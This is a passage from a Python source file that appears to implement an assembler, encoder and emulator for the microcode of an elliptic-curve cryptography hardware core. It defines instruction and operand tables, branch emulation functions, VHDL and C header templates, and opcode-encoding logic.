imm\n else:\n execution_context.ip += 1\n return execution_context\n\ndef jl_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Jump with link\n imm = abstract_operands[0][2]\n execution_context.lrip = execution_context.ip + 1\n execution_context.ip = imm\n return execution_context\n\ndef jlsn_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Jump with link to our target only if 'SN' is set\n if execution_context.flags['%SN'] == 1:\n imm = abstract_operands[0][2]\n execution_context.lrip = execution_context.ip + 1\n execution_context.ip = imm\n else:\n execution_context.ip += 1\n return execution_context\n\ndef ret_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Return to lrip\n execution_context.ip = execution_context.lrip\n return execution_context\n\ndef barrier_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Nothing to do here, we do not\n # increment ip\n return execution_context\n\ndef stop_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Nothing to do here, we do not\n # increment ip\n return execution_context\n\n\n## VHDL files creation headers and footers\n##########################################################\necc_curve_iram_begin =r\"\"\"\n-- -------------------------------------------------------\n-- This file is automatically generated through scripting\n-- -------------------------------------------------------\n\nlibrary ieee;\nuse ieee.std_logic_1164.all;\nuse ieee.numeric_std.all;\n\nuse work.ecc_customize.all; -- for debug & nbopcodes parameters\nuse work.ecc_utils.all; -- for function ge_pow_of_2\nuse work.ecc_pkg.all; -- for IRAM_ADDR_SZ & OPCODE_SZ parameters\n\n-- code below conforms to Xilinx's synthesis recommandations for\n-- VHDL coding style of a simple dual-port BRAM with _two_clocks_\n-- (see Vivado Design Suite User Guide, Synthesis, UG901, v2014.1,\n-- May 1, 2014, pp. 105-106)\n-- except that it describes a two-cycle delay on the read data path.\n-- Depending on the FPGA vendor/family device target, an extra-layer of\n-- register may be present inside the Block-RAM providing such 2-cycle\n-- latency, as it leads to better timing performance (at the cost of\n-- a small increase in the Block-RAM area).\n-- In this case it is best for area performance to ensure that the\n-- extra register layer on the read data path is held back inside\n-- the Block-RAM by back-end tools\nentity ecc_curve_iram is\n\tgeneric(\n\t\trdlat : positive range 1 to 2 := 2);\n\tport(\n\t\t-- port A: write-only interface to AXI-lite interface\n\t\tclka : in std_logic;\n\t\twea : in std_logic;\n\t\taddra : in std_logic_vector(IRAM_ADDR_SZ - 1 downto 0);\n\t\tdia : in std_logic_vector (OPCODE_SZ - 1 downto 0);\n\t\t-- port B: read-only interface to ecc_curve\n\t\tclkb : in std_logic;\n\t\treb : in std_logic;\n\t\taddrb : in std_logic_vector (IRAM_ADDR_SZ - 1 downto 0);\n\t\tdob : out std_logic_vector (OPCODE_SZ - 1 downto 0)\n\t);\nend entity ecc_curve_iram;\n\narchitecture syn of ecc_curve_iram is\n\n\tsubtype std_logic_opcode is std_logic_vector(OPCODE_SZ - 1 downto 0);\n\ttype mem_content_type is array(integer range 0 to ge_pow_of_2(nbopcodes) - 1)\n\t\tof std_logic_opcode;\n\tshared variable mem_content : mem_content_type := (\n\t\t-- content of static memory automatically written below through scripting\n\t\t--\n\t\t-- opcode in binary format address opcode in hex\n\t\t-- <-----------------------------> <---------> <---------->\n\"\"\"\n\necc_curve_iram_end = r\"\"\"\n\t\tothers => (others => '0')\n\t);\n\tsignal predoutb : std_logic_opcode;\n\nbegin\n\n\t-- ---------------------------------------------\n\t-- Port A (W only) is only present in debug mode\n\t-- ---------------------------------------------\n\td0: if debug generate -- statically resolved by synthesizer\n\t\tprocess(clka)\n\t\tbegin\n\t\t\tif (clka'event and clka = '1') then\n\t\t\t\t-- write logic\n\t\t\t\t-- (in simulation, only affects array content if no METAVALUE in addra)\n\t\t\t\t-- otherwise issue a WARNING message\n\t\t\t\tif (wea = '1') then\n\t\t\t\t\tassert(not is_X(addra))\n\t\t\t\t\t\treport \"write to ecc_curve_iram with a METAVALUE address\"\n\t\t\t\t\t\t\tseverity WARNING;\n\t\t\t\t\tmem_content(to_integer(unsigned(addra))) := dia;\n\t\t\t\tend if;\n\t\t\tend if;\n\t\tend process;\n\tend generate;\n\n\t-- --------------------------------------------------------------\n\t-- Port B (R only) is the nominal port used by ecc_curve to fetch\n\t-- instructions (which makes ecc_curve_iram a ROM when debug mode\n\t-- is not activated)\n\t-- --------------------------------------------------------------\n\tr1 : if rdlat = 1 generate -- statically resolved by synthesizer\n\t\tprocess(clkb)\n\t\tbegin\n\t\t\tif (clkb'event and clkb = '1') then\n\t\t\t\t-- read logic\n\t\t\t\t-- (in simulation returns 'force unknown' ('X') if METAVALUE in addrb)\n\t\t\t\tif (reb = '1') then\n\t\t\t\t\t-- pragma translate_off\n\t\t\t\t\tif is_X(addrb) then\n\t\t\t\t\t\tdob <= (others => 'X');\n\t\t\t\t\telse\n\t\t\t\t\t-- pragma translate_on\n\t\t\t\t\t\tdob <= mem_content(to_integer(unsigned(addrb)));\n\t\t\t\t\t-- pragma translate_off\n\t\t\t\t\tend if;\n\t\t\t\t\t-- pragma translate_on\n\t\t\t\tend if;\n\t\t\tend if;\n\t\tend process;\n\tend generate;\n\n\tr2 : if rdlat = 2 generate -- statically resolved by synthesizer\n\t\tprocess(clkb)\n\t\tbegin\n\t\t\tif (clkb'event and clkb = '1') then\n\t\t\t\tif (reb = '1') then\n\t\t\t\t\t-- pragma translate_off\n\t\t\t\t\tif is_X(addrb) then\n\t\t\t\t\t\tdob <= (others => 'X');\n\t\t\t\t\telse\n\t\t\t\t\t-- pragma translate_on\n\t\t\t\t\t\tpredoutb <= mem_content(to_integer(unsigned(addrb)));\n\t\t\t\t\t-- pragma translate_off\n\t\t\t\t\tend if;\n\t\t\t\t\t-- pragma translate_on\n\t\t\t\tend if;\n\t\t\t\tdob <= predoutb;\n\t\t\tend if;\n\t\tend process;\n\tend generate;\n\nend architecture syn;\n\"\"\"\n\necc_addr_begin = r\"\"\"\n-- -------------------------------------------------------\n-- This file is automatically generated through scripting\n-- -------------------------------------------------------\n\nlibrary ieee;\nuse ieee.std_logic_1164.all;\nuse ieee.numeric_std.all;\n\nuse work.ecc_pkg.all;\n\npackage ecc_addr is\n\n\"\"\"\n\necc_addr_end = r\"\"\"\n\nend package ecc_addr;\n\"\"\"\n\necc_addr_h_begin = r\"\"\"\n/**********************************************************\n * This file is automatically generated through scripting *\n **********************************************************/\n\n#ifndef __ECC_ADDR_H__\n#define __ECC_ADDR_H__\n\n/* Nominal symbols\n *\n * (main FSM of ecc_scalar uses these addresses\n * to run microcode routines).\n */\n\"\"\"\n\necc_addr_h_middle = r\"\"\"\n/* Debug symbols\n *\n * (these addresses can be used by the software driver\n * to break on specific useful steps of the microcode,\n * when in debug mode).\n */\n\"\"\"\n\necc_addr_h_end = r\"\"\"\n#endif /* __ECC_ADDR_H__ */\n\"\"\"\n\n\n#####################################################\n#####################################################\n\ndef key_words_regexp(l):\n ret = \"\"\n i = 0\n for k in l:\n ret += k\n i += 1\n if i != len(l):\n ret += \"|\"\n return ret\n\n# Default values, updated when read from\n# VHDL files\nBIGNUM_BITS_SIZE = 528\nOPERANDS_BITS_SIZE = 5\nPATCH_BITS_SIZE = 6\nIMMEDIATE_BITS_SIZE = 9\nCONSTANTS_BITS_SIZE = 2\nOPCODE_BITS_SIZE = 4\nOPCODE_CLASS_BITS_SIZE = 2\nipecc_operands_dict = {\n\t\"p\": \"00000\",\n\t\"a\": \"00001\",\n\t\"b\": \"00010\",\n\t\"q\": \"00011\",\n\t\"k\": \"00100\",\n\t\"XR1\": \"00110\",\n\t\"YR1\": \"00111\",\n\t\"XR0\": \"00100\",\n\t\"YR0\": \"00101\",\n\t\"ZR01\": \"11010\",\n\t\"one\": \"11110\",\n\t\"zero\": \"11111\",\n\t\"R\": \"11101\",\n\t\"kb0\": \"00100\",\n\t\"kb1\": \"00101\",\n\t\"phi0\": \"01010\",\n\t\"phi1\": \"01011\",\n\t\"kap0\": \"01100\",\n\t\"kap1\": \"01101\",\n\t\"kapP0\": \"01110\",\n\t\"kapP1\": \"01111\",\n\t\"R2modp\": \"10011\",\n\t\"XPBK\": \"11011\",\n\t\"YPBK\": \"11100\",\n\t\"ZPBK\": \"10110\",\n\t\"inverse\": \"10101\",\n\t\"dtmp\": \"10100\",\n\t\"XmXU\": \"01000\",\n\t\"twop\": \"11000\",\n\t\"red\": \"10110\",\n\t\"dy1\": \"01111\",\n\t\"dy2\": \"10000\",\n\t\"dx1\": \"10111\",\n\t\"dx2\": \"10001\",\n\t\"du\": \"11001\",\n\t\"dv\": \"11010\",\n\t\"dx\": \"11011\",\n\t\"dy\": \"11100\",\n\t\"r0\": \"11001\",\n\t\"r1\": \"11010\",\n\t\"two\": \"10111\",\n\t\"pmtwo\": \"10001\",\n\t\"idx\": \"01111\",\n\t\"aX\": \"01111\",\n\t\"right\": \"01111\",\n\t\"mustbezero\": \"10101\",\n\t\"YY\": \"10000\",\n\t\"left\": \"10000\",\n\t\"XX\": \"10001\",\n\t\"XXX\": \"10001\",\n\t\"XR\": \"10001\",\n\t\"R3modp\": \"10100\",\n\t\"mu0\": \"11010\",\n\t\"mu1\": \"11011\",\n\t\"kap0msk\": \"01000\",\n\t\"kap1msk\": \"01001\",\n\t\"kapP0msk\": \"10000\",\n\t\"kapP1msk\": \"10001\",\n\t\"phi0msk\": \"10100\",\n\t\"phi1msk\": \"10101\",\n\t\"qsh0\": \"01000\",\n\t\"qsh1\": \"01001\",\n\t\"btmp0\": \"01010\",\n\t\"btmp1\": \"01011\",\n\t\"alf\": \"01100\",\n\t\"m0\": \"01010\",\n\t\"m1\": \"01011\",\n\t\"alfmsk\": \"01111\",\n\t\"ZZ\": \"01000\",\n\t\"ZZZZ\": \"01000\",\n\t\"aZZZZ\": \"01000\",\n\t\"2YR1\": \"01000\",\n\t\"M\": \"01001\",\n\t\"MpSmT\": \"01001\",\n\t\"Q\": \"01001\",\n\t\"YYYY\": \"10000\",\n\t\"QQ\": \"10000\",\n\t\"S\": \"10001\",\n\t\"SmT\": \"10001\",\n\t\"X1YY\": \"10010\",\n\t\"lambdasq\": \"10110\",\n\t\"MM\": \"10110\",\n\t\"lambda\": \"10101\",\n\t\"lambdacu\": \"10101\",\n\t\"Y1Z1\": \"10101\",\n\t\"A\": \"01000\",\n\t\"BmX\": \"01000\",\n\t\"W\": \"01000\",\n\t\"F\": \"01000\",\n\t\"C\": \"01001\",\n\t\"CmB\": \"01001\",\n\t\"BpC\": \"01001\",\n\t\"H\": \"01001\",\n\t\"J\": \"01001\",\n\t\"YmY\": \"10000\",\n\t\"G\": \"10100\",\n\t\"D\": \"10001\",\n\t\"DmB\": \"10001\",\n\t\"Xtmp\": \"10100\",\n\t\"Ytmp\": \"10101\",\n\t\"XmXC\": \"10101\",\n\t\"YpY\": \"10100\",\n\t\"B\": \"10111\",\n\t\"A1\": \"11001\",\n\t\"CCmB\": \"11001\",\n\t\"XSUB\": \"01000\",\n\t\"YSUB\": \"10000\",\n\t\"XR0tmp\": \"10000\",\n\t\"YR0tmp\": \"10001\",\n\t\"ZPBKsq\": \"01110\",\n\t\"ZPBKcu\": \"01110\",\n\t\"ZR01sq\": \"10101\",\n\t\"ZR01cu\": \"10101\",\n\t\"ZR01END\": \"11001\",\n\t\"XR1tmp\": \"10110\",\n\t\"YR1tmp\": \"10100\",\n\t\"invsq\": \"01010\",\n\t\"invcu\": \"01011\",\n\t\"patchme\": \"10101\",\n\t\"HH\": \"01010\",\n\t\"tHH\": \"01010\",\n\t\"Ia\": \"01010\",\n\t\"I\": \"01100\",\n\t\"Ja\": \"01001\",\n\t\"r\": \"01011\",\n\t\"V\": \"01010\",\n\t\"rsq\": \"01100\",\n\t\"JpV\": \"01101\",\n\t\"Jp2V\": \"01101\",\n\t\"YmJ\": \"01001\",\n\t\"tYmJ\": \"01001\",\n\t\"VmX\": \"01010\",\n\t\"rVmX\": \"01010\",\n\t\"XR0bk\": \"01110\",\n\t\"YR0bk\": \"01111\",\n\t\"XR1bk\": \"11100\",\n\t\"YR1bk\": \"01100\",\n \"XADD\": \"10001\",\n \"K\": \"10000\",\n \"YADD\": \"10000\",\n \"Ec\": \"11001\",\n \"BmXC\": \"01000\",\n \"MD\": \"01000\",\n \"Msq\": \"10101\",\n \"N\": \"01000\",\n \"Nsq\": \"01000\",\n \"Nsq0\": \"10111\",\n \"E\": \"01001\",\n \"L\": \"10000\",\n \"XpE\": \"10100\",\n \"BpL\": \"10001\",\n \"twoB\": \"10101\",\n \"threeB\": \"10111\",\n \"EpN\": \"11001\",\n \"YpZ\": \"10101\",\n \"YpZsq\": \"10101\",\n \"twoS\": \"10111\",\n\t\"Rmodp\": \"11101\",\n \"Qs\": \"01001\",\n \"AZ\": \"01000\",\n \"KK\": \"10000\",\n \"BZ\": \"10111\",\n \"BZd\": \"10111\",\n \"Xup\": \"01000\",\n \"Yup\": \"01001\",\n \"Ztmp\": \"11001\",\n \"Yopp\": \"10101\",\n \"Ykeep\": \"10000\",\n \"Xkeep\": \"10100\",\n # \"Patch\" operand, dummy value\n \"patchme\": \"10101\",\n ### Disassembly registers for\n ### recompiling the disassembly\n\t\"disass_r0\": \"00000\",\n\t\"disass_r1\": \"00001\",\n\t\"disass_r2\": \"00010\",\n\t\"disass_r3\": \"00011\",\n\t\"disass_r4\": \"00100\",\n\t\"disass_r5\": \"00101\",\n\t\"disass_r6\": \"00110\",\n\t\"disass_r7\": \"00111\",\n\t\"disass_r8\": \"01000\",\n\t\"disass_r9\": \"01001\",\n\t\"disass_r10\": \"01010\",\n\t\"disass_r11\": \"01011\",\n\t\"disass_r12\": \"01100\",\n\t\"disass_r13\": \"01101\",\n\t\"disass_r14\": \"01110\",\n\t\"disass_r15\": \"01111\",\n\t\"disass_r16\": \"10000\",\n\t\"disass_r17\": \"10001\",\n\t\"disass_r18\": \"10010\",\n\t\"disass_r19\": \"10011\",\n\t\"disass_r20\": \"10100\",\n\t\"disass_r21\": \"10101\",\n\t\"disass_r22\": \"10110\",\n\t\"disass_r23\": \"10111\",\n\t\"disass_r24\": \"11000\",\n\t\"disass_r25\": \"11001\",\n\t\"disass_r26\": \"11010\",\n\t\"disass_r27\": \"11011\",\n\t\"disass_r28\": \"11100\",\n\t\"disass_r29\": \"11101\",\n\t\"disass_r30\": \"11110\",\n\t\"disass_r31\": \"11111\",\n}\n\nFLAGS_BITS_SIZE = OPERANDS_BITS_SIZE\nipecc_flags_dict = {\n \"%mu0\" : \"10000\",\n \"%kb0\" : \"01000\",\n \"%par\" : \"00100\",\n \"%kap\" : \"00010\",\n \"%kapP\" : \"00001\",\n}\n\n# Internal IPECC flags, *Only* used\n# for emulation as they are of no use\n# for simple assemby/disassembly\nipecc_internal_flags_dict = {\n # Arithmetic carry flag\n \"%Carith\" : None,\n # Shift carry flag\n \"%Cshift\" : None,\n # Zero flag\n \"%Z\" : None,\n # Strictly negative flag\n \"%SN\" : None,\n}\n\n# Operands\ndef ipecc_operand():\n return key_words_regexp(ipecc_operands_dict.keys())\n# Flags\ndef ipecc_flag():\n return key_words_regexp(ipecc_flags_dict.keys())\ndef ipecc_internal_flag():\n return key_words_regexp(ipecc_internal_flags_dict.keys())\n# Numerical constant\ndef ipecc_const():\n return \"[0-9]+|0[x][0-9a-fA-F]+\"\n\nipecc_labels_dict = {\n # This is to be populated by the address resolver\n # pass\n}\n\nipecc_label_ = \"\"\ndef ipecc_label():\n global ipecc_labels_dict\n global ipecc_label_\n # Protect the '.'\n a = []\n for k in ipecc_labels_dict.keys():\n if k[0] == r'.':\n # NOTE: 1: to skip the '.', :-1 to remove the\n # final ':'\n a.append(r'\\.'+k[1:-1])\n ipecc_label_ = key_words_regexp(a)\n\n\nipecc_instructions_dict = {\n\t# NOP instruction\n\t\"NOP\" : ([], \"NOP\", \"0000\", None, nop_emulate),\n\t# arithmetic instructions\n\t# values here must match their equivalent ones in ecc_pkg.vhd!\n\t# (starting with the string \"OPCODE_ARITH_\")\n\t\"NNADD\" : ([ipecc_operand(), ipecc_operand(), ipecc_operand()], \"ARITH\", \"0001\", \"ADD\", nnadd_emulate),\n\t\"NNSUB\" : ([ipecc_operand(), ipecc_operand(), ipecc_operand()], \"ARITH\", \"0010\", \"SUB\", nnsub_emulate),\n\t\"NNSRL\" : ([ipecc_operand(), None, ipecc_operand()], \"ARITH\", \"0011\", \"SRL\", nnsrl_emulate),\n\t\"NNSLL\" : ([ipecc_operand(), None, ipecc_operand()], \"ARITH\", \"0100\", \"SLL\", nnsll_emulate),\n\t\"NNRND\" : ([None, None, ipecc_operand()], \"ARITH\", \"0101\", \"RND\", nnrnd_emulate),\n\t\"TESTPARS\" : ([ipecc_operand(), ipecc_const(), ipecc_flag()], \"ARITH\", \"0110\", \"TSH\", testpars_emulate),\n\t\"NNXOR\" : ([ipecc_operand(), ipecc_operand(), ipecc_operand()], \"ARITH\", \"0111\", \"XOR\", nnxor_emulate),\n\t\"FPREDC\" : ([ipecc_operand(), ipecc_operand(), ipecc_operand()], \"ARITH\", \"1000\", \"RED\", fpredc_emulate),\n\t\"TESTPAR\" : ([ipecc_operand(), None, ipecc_flag()], \"ARITH\", \"1001\", \"TST\", testpar_emulate),\n\t\"NNRNDM\" : ([None, None, ipecc_operand()], \"ARITH\", \"1010\", \"RNM\", nnrndm_emulate),\n\t\"NNDIV2\" : ([ipecc_operand(), None, ipecc_operand()], \"ARITH\", \"1011\", \"DIV\", nndiv2_emulate),\n\t\"NNRNDS\" : ([None, ipecc_const(), ipecc_operand()], \"ARITH\", \"1100\", \"RNH\", nnrnds_emulate),\n\t\"NNRNDF\" : ([None, ipecc_const(), ipecc_operand()], \"ARITH\", \"1101\", \"RNF\", nnrndf_emumate),\n\t\"NNSRLS\" : ([ipecc_operand(), ipecc_const(), ipecc_operand()], \"ARITH\", \"1110\", \"SRH\", nnsrls_emulate),\n\t# branch instructions, the None is to be updated with a\n # proper label after the fitst pass\n\t\"J\" : ([None], \"BRANCH\", \"0001\", \"B\", j_emulate),\n\t\"JZ\" : ([None], \"BRANCH\", \"0010\", \"BZ\", jz_emulate),\n\t\"JSN\" : ([None], \"BRANCH\", \"0011\", \"BSN\", jsn_emulate),\n\t\"JODD\" : ([None], \"BRANCH\", \"0100\", \"BODD\", jodd_emulate),\n\t\"JKAP\" : ([None], \"BRANCH\", \"0101\", \"BKAP\", jkap_emulate),\n\t\"JL\" : ([None], \"BRANCH\", \"0110\", \"CALL\", jl_emulate),\n\t\"JLSN\" : ([None], \"BRANCH\", \"0111\", \"CALLSN\", jlsn_emulate),\n\t\"RET\" : ([], \"BRANCH\", \"1000\", \"RET\", ret_emulate),\n # \"Pseudo\" instructions, None encoding means nothing\n # to encode\n \"BARRIER\" : ([], \"PSEUDO\", None, None, barrier_emulate),\n \"STOP\" : ([], \"PSEUDO\", None, None, stop_emulate),\n # \"Aliases\": empty encoding means an alias\n \"NNCLR\" : ([ipecc_operand()], \"ALIAS\", \"NNADD\", ['zero', 'zero', 'OPERAND0'], None),\n \"NNMOV\" : ([ipecc_operand(), ipecc_operand()], \"ALIAS\", \"NNADD\", ['OPERAND0', 'zero', 'OPERAND1'], None),\n \"B\" : ([None], \"ALIAS\", \"J\", ['OPERAND0'], None),\n \"BZ\" : ([None], \"ALIAS\", \"JZ\", ['OPERAND0'], None),\n \"BSN\" : ([None], \"ALIAS\", \"JSN\", ['OPERAND0'], None),\n \"BODD\" : ([None], \"ALIAS\", \"JODD\", ['OPERAND0'], None),\n \"BKAP\" : ([None], \"ALIAS\", \"JKAP\", ['OPERAND0'], None),\n \"CALL\" : ([None], \"ALIAS\", \"JL\", ['OPERAND0'], None),\n \"CALLSN\" : ([None], \"ALIAS\", \"JLSN\", ['OPERAND0'], None),\n}\n\ndef ipecc_instruction():\n return key_words_regexp(ipecc_instructions_dict.keys())\n\n# Refresh our instructions dict\ndef ipecc_instructions_dict_refresh_operands():\n global ipecc_instructions_dict\n for k in ipecc_instructions_dict.keys():\n a = ipecc_instructions_dict[k]\n ops = []\n for op in ipecc_instructions_dict[k][0]:\n if (op is not None) and (op != ipecc_const()) and (op != ipecc_label_) and (op != ipecc_flag()):\n # This is an operand() type, refresh it\n ops.append(ipecc_operand())\n else:\n ops.append(op)\n a = (ops, a[1], a[2], a[3], a[4])\n ipecc_instructions_dict[k] = a\n\n\nipecc_instructions_types_dict = {\n \"NOP\" : \"00\",\n \"ARITH\" : \"01\",\n \"BRANCH\" : \"10\",\n}\n\n##########################################################\ndef getbitlen(bint):\n \"\"\"\n Returns the number of bits encoding an integer\n \"\"\"\n if bint is None:\n return 0\n if bint == 0:\n # Zero is encoded on one bit\n return 1\n return int(bint).bit_length()\n\n# Integer to binay string\ndef int_to_binstring(a, nbits):\n ret = \"\"\n for i in range(0, nbits):\n if (a >> (nbits - i - 1)) & 1 == 1:\n ret += \"1\"\n else:\n ret += \"0\"\n return ret\n\n# Binay string to integer\ndef binstring_to_int(b):\n ret = 0\n for i in range(0, len(b)):\n if b[len(b) - i - 1] == \"1\":\n ret |=(0x1 << i)\n return ret\n\ndef term_colors_supported():\n # Only use colors in a real terminal\n return sys.stdout.isatty()\n\ndef print_error(err, l, reason):\n if term_colors_supported() is True:\n print(bcolors.FAIL+err+bcolors.ENDC + bcolors.HEADER+l+bcolors.ENDC + bcolors.OKCYAN+reason+bcolors.ENDC)\n else:\n print(err+ l + reason)\n\ndef print_warning(err, reason):\n if term_colors_supported() is True:\n print(bcolors.WARNING+err+bcolors.ENDC + bcolors.WARNING+reason+bcolors.ENDC)\n else:\n print(err + reason)\n\ndef print_info(inf, msg):\n if term_colors_supported() is True:\n print(bcolors.OKCYAN+inf+bcolors.ENDC + bcolors.OKBLUE+msg+bcolors.ENDC)\n else:\n print(inf + msg)\n\ndef print_progress(msg):\n if term_colors_supported() is True:\n print(bcolors.OKGREEN+msg+bcolors.ENDC)\n else:\n print(msg)\n\n##########################################################\n# Resolve the labels addresses and populate the\n# labels dict\ndef resolve_labels(asm):\n lines = asm.splitlines()\n address = 0\n for l in lines:\n # Skip comments\n comment = re.search(r\"^\\s*#\", l)\n empty_line = re.search(r\"^\\s*$\", l)\n if (comment is None) and (empty_line is None):\n # Actual label or opcode\n label = re.search(r\"^\\s*(\\.[a-zA-Z0-9].*:)\\s*(#.*)*$\", l)\n opcode = re.search(r\"^\\s*(\"+ipecc_instruction()+r\")\", l, flags=re.IGNORECASE)\n if label is not None:\n label = label.group(1)\n # We have a new label!\n ipecc_labels_dict[label] = (int_to_binstring(address, IMMEDIATE_BITS_SIZE), hex(address))\n if opcode is not None:\n # If we have a pseudo instruction do not increment,\n # else increment\n opcode = opcode.group(1).upper()\n if ipecc_instructions_dict[opcode][1] != \"PSEUDO\":\n # Increment our address count\n address += 1\n # Update our labels list\n ipecc_label()\n # Update our instructions dictionary\n for k in ipecc_instructions_dict.keys():\n if ipecc_instructions_dict[k][0] == [None]:\n ipecc_instructions_dict[k][0][0] = ipecc_label_\n\n# Encode the opcodes\ndef encode_opcodes(asm):\n lines = asm.splitlines()\n line_num = 1\n # The encoding\n encoding = \"\"\n barrier_set = False\n abstract_asm_representation = []\n current_addr = 0\n for l in lines:\n # Local options flags\n OPTIONS = []\n OPERANDS = []\n # Operands for our abstract representation\n ABSTRACT_OPERANDS = [None, None, None]\n # Skip comments, empty lines and labels\n comment = re.search(r\"^\\s*#\", l)\n empty_line = re.search(r\"^\\s*$\", l)\n label = re.search(r\"^\\s*(\\.[a-zA-Z0-9].*:)\\s*(#.*)*$\", l)\n if (comment is None) and (empty_line is None) and (label is None):\n inst = re.search(r\"^\\s*(\"+ipecc_instruction()+r\")([,\\s]+.*)\", l, flags=re.IGNORECASE)\n if inst is None:\n inst = re.search(r\"^\\s*(\"+ipecc_instruction()+r\")(,.*)\", l, flags=re.IGNORECASE)\n if inst is None:\n inst = re.search(r\"^\\s*(\"+ipecc_instruction()+r\")(#.*)*$(.*)\", l, flags=re.IGNORECASE)\n if inst is None:\n print_error(\"Syntax error line %d: \" % line_num, l, \", unknown instruction\")\n sys.exit(-1)\n options = None\n operands = None\n instruction = inst.group(1).upper()\n rest = inst.group(2)\n #################################\n ## Try to get the possible options\n if rest is not None:\n # Now get the possible options\n options = re.search(r\"(,p[0-9]+|,X|,M)?(,p[0-9]+|,X|,M)?(,p[0-9]+|,X|,M)?(.*)\", rest)\n if options is not None:\n if options.group(1) is not None:\n OPTIONS.append(options.group(1)[1:])\n if options.group(2) is not None:\n OPTIONS.append(options.group(2)[1:])\n if options.group(3) is not None:\n OPTIONS.append(options.group(3)[1:])\n if options.group(4) is not None:\n rest = options.group(4)\n # Sanity check on the options\n check = 0\n if 'X' in OPTIONS:\n check += 1\n if 'M' in OPTIONS:\n check += 1\n if len(OPTIONS) > (check + 1):\n print_error(\"Syntax error line %d: \" % line_num, l, \", too many extensions or patches for instruction\")\n sys.exit(-1)\n #################################\n # Try to get the operands\n # Get the instruction semantic\n semantic = ipecc_instructions_dict[instruction]\n # Construct our operand pattern from the semantic\n op_re = r\"^\\s*\"\n local_num_operands = 0\n for op in semantic[0]:\n if op is not None:\n local_num_operands += 1\n op_re += r\"(\"+op+r\")\" + r\"\\s*\"\n op_re += r\"(#.*)*$\"\n if (rest is None) and (local_num_operands > 0):\n print_error(\"Syntax error line %d: \" % line_num, l, \", instruction expects operands\")\n sys.exit(-1)\n if rest is not None:\n # If we do not have arguments, check that we have nothing left\n if local_num_operands == 0:\n op_re_noop = r\"^\\s*(#.*)*$\"\n check = re.search(op_re_noop, rest)\n if check is None:\n print_error(\"Syntax error line %d: \" % line_num, l, \", operands provided for a no-operand instruction\")\n sys.exit(-1)\n operands = re.search(op_re, rest)\n if operands is None:\n print_error(\"Syntax error line %d: \" % line_num, l, \" bad operands\")\n if ipecc_instructions_dict[instruction][1] == \"BRANCH\":\n print_info(\"Hint: \", \"this is a branch instruction: have you defined the target label?\")\n else:\n print_info(\"Hint: \", \"check the operands: are they well defined in the CSV?\")\n sys.exit(-1)\n # Do we have arguments to parse?\n for i in range(0, local_num_operands):\n if operands.group(i+1) is None:\n print_error(\"Syntax error line %d: \" % line_num, l, \" bad operands\")\n print_info(\"Hint: \", \"check the operands: are they well defined in the CSV?\")\n sys.exit(-1)\n OPERANDS.append(operands.group(i+1))\n # Handle the ALIASes here\n if ipecc_instructions_dict[instruction][1] == \"ALIAS\":\n # Get the aliased instruction true semantic\n unaliased_instruction = ipecc_instructions_dict[instruction][2]\n # Get the operands semantic\n sem = ipecc_instructions_dict[instruction][3]\n # Replace our instruction\n instruction = unaliased_instruction\n # Handle our operands\n NEWOPERANDS = []\n for op in sem:\n aa = re.search(r\"OPERAND([0-9]+)\", op)\n if aa is not None:\n # Original operand\n op_num = int(aa.group(1))\n NEWOPERANDS.append(OPERANDS[op_num])\n else:\n # External operand\n NEWOPERANDS.append(op)\n OPERANDS = NEWOPERANDS\n if ipecc_instructions_dict[instruction][1] == \"PSEUDO\":\n if instruction == \"BARRIER\":\n barrier_set = True\n else:\n barrier_set = False\n if instruction == \"STOP\":\n # Patch our \"S\" bit in the previous instruction\n encoding = encoding.replace('S', '1')\n else:\n # Patch our \"S\" bit in the previous instruction\n encoding = encoding.replace('S', '0')\n current_encoding = \"\"\n if ipecc_instructions_dict[instruction][1] != \"PSEUDO\":\n # Patch our \"S\" bit in the previous instruction\n encoding = encoding.replace('S', '0')\n # OK, now proceed with the current_encoding of the opcode\n ### Bits 31 and 30 that handle BARRIER and STOP\n # Bit 31 is set if the next instruction is a STOP\n # NOTE => this should be handled in the next loop\n # iteration\n current_encoding += \"S\" # To be patched\n # BIT 30 is set if the previous instruction is a BARRIER\n if barrier_set is True:\n current_encoding += \"1\"\n barrier_set = False\n else:\n current_encoding += \"0\"\n ### Bits 29 downto 28 (either ARITH or BRANCH) & 27 downto 24 (OPCODE)\n current_encoding += ipecc_instructions_types_dict[ipecc_instructions_dict[instruction][1]]\n current_encoding += ipecc_instructions_dict[instruction][2]\n ### Bit 23 encodes the 'X' (eXtended arithmetic)\n if 'X' in OPTIONS:\n current_encoding += \"1\"\n else:\n current_encoding += \"0\"\n ### Bit 22 downto 16 (bit 22 is set to 1 if there is a patch, 0 otherwise\n ### bits 21 downto 16 encode a 6-bit patch ID if bit 22 is 1)\n PATCH = False\n for p in OPTIONS:\n aa = re.search(r\"p([0-9]+)\", p)\n if aa is not None:\n patch_num = int(aa.group(1))\n if patch_num >= 2**PATCH_BITS_SIZE:\n print_error(\"Syntax error line %d: \" % line_num, l, \", patch number %d exceed %d-bit width\" % (patch_num, PATCH_BITS_SIZE))\n sys.exit(-1)\n PATCH = True\n current_encoding += (\"1\" + int_to_binstring(patch_num, PATCH_BITS_SIZE))\n break\n if PATCH is False:\n current_encoding += (\"0\" + (\"0\" * PATCH_BITS_SIZE))\n ### Bit 15 is the 'M' flag\n if 'M' in OPTIONS:\n current_encoding += \"1\"\n else:\n current_encoding += \"0\"\n ### Bit 14 downto 0 are the operands\n if ipecc_instructions_dict[instruction][1] == \"NOP\":\n # No operand for NOP\n current_encoding += \"0\" * (3 * OPERANDS_BITS_SIZE)\n elif ipecc_instructions_dict[instruction][1] == \"ARITH\":\n # Some sanity checks\n if len(OPERANDS) > 3:\n print_error(\"Syntax error line %d: \" % line_num, l, \", operands number %d > 3 for ARITH instruction\" % (len(OPERANDS)))\n sys.exit(-1)\n # Put our operands\n num_op = 0\n real_num_op = 0\n for opn in range(0, 3):\n if ipecc_instructions_dict[instruction][0][opn] is None:\n # Skip None operands\n current_encoding += \"0\" * OPERANDS_BITS_SIZE\n real_num_op += 1\n continue\n # Do we have flags?\n if 